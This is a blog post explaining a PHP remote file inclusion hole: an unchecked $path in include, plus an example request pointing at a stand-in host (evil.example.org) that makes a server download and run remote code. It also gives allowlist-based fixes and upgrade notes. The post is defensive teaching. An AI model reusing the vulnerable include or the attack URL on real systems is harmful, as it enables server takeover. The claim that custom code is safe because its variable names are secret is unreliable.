szehau's weblog

Life, Internet, Software, Gadgets, Programming and Investments
PHP security problem

I only learned about this problem a month ago, when one of my friends' websites on my server was hacked and a background program was installed. The background program generated huge, useless image and movie files on the server.

After hours of inspecting my server, I found the background program running under Apache's process. The background program was called "footer.gif". Smart, huh? They gave the background program an image file's name so that people wouldn't notice it.

Actually, it is not a security bug in PHP itself. It is a problem of open source scripts and careless programmers.

The problem occurs when your PHP scripts contain code like this:

// example.php: $path comes from the request and is used in include without any check
include "$path/script.php";

If register_globals is on (or the script copies the request parameter into $path without checking it), the page can be requested with http://yourdomain/example.php?path=http%3A%2F%2Fevil.example.org%2F%3F and the script will effectively run:

// example.php: the "?" in the URL turns "/script.php" into a query string, so the remote server can return anything
include "http://evil.example.org/?/script.php";

What happens then? Your PHP script downloads the code from "http://evil.example.org/?/script.php" and runs it as if it were a local PHP file. This is very dangerous because that URL can return any malicious code, and it will run with your web server's privileges: compiling a C program, deleting files, scanning and reading personal data from your server directories, and so on.
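The fix is to stop building include paths from request data at all. The following is an added example, not code from the original post: it shows the vulnerable pattern from above next to a hardened version in which the request only selects a key from a fixed allowlist. The names $allowed_pages, resolve_page(), render_page() and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example (not the original post's code): vulnerable include beside a
// hardened version. The allowlist, directory name and function names are
// assumptions for illustration.

// --- Vulnerable: the include path is built from request data -------------
// With register_globals on (or an explicit $path = $_GET['path'];) a request
// ?path=http%3A%2F%2Fevil.example.org%2F%3F turns this into
//   include "http://evil.example.org/?/script.php";
function vulnerable_include(string $path): void
{
    include "$path/script.php";
}

// --- Hardened: never build an include path from untrusted input ----------
// The request value is only a lookup key; the real file name comes from a
// fixed allowlist, so neither a URL nor a ../ traversal can reach include.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of an allowed page, or null if the request
// does not name one.
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $file = realpath(PAGES_DIR . '/' . ALLOWED_PAGES[$requested]);
    $base = realpath(PAGES_DIR);
    // Defence in depth: the resolved file must still live under PAGES_DIR.
    if ($file === false || $base === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

function render_page(string $requested): void
{
    $file = resolve_page($requested);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;                         // always a file we chose, never the client
}

// Usage: $page comes from the request but is only ever used as a lookup key.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
render_page($page);
```

Two things are worth knowing about the server side as well. PHP only follows a URL in include when remote file access is enabled (allow_url_fopen in older PHP; since PHP 5.2 a separate allow_url_include setting, off by default, governs include/require), so turning that off in php.ini blocks the remote variant. It does not block the local variant, where the same unchecked $path is used to include files already on the server, which is why the allowlist in the code is the actual fix.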

For more information and solutions, check the PHP Security Consortium site.

So, if you are using an open source script, please make sure it has fixed the security hole mentioned above, and always use the latest stable version of the script. It will be safer if you are using your own code, because nobody will know the variable names you are using in your scripts.

Some of the open source PHP scripts that have this problem:

  • WordPress 1.5.2 – Please upgrade to 1.5.3 or above
  • Plogger Beta 2 – Please upgrade to 2.1

About Sze Hau

Geek. Love programming. Coffee addicted. Married with a child. Working towards financial freedom.
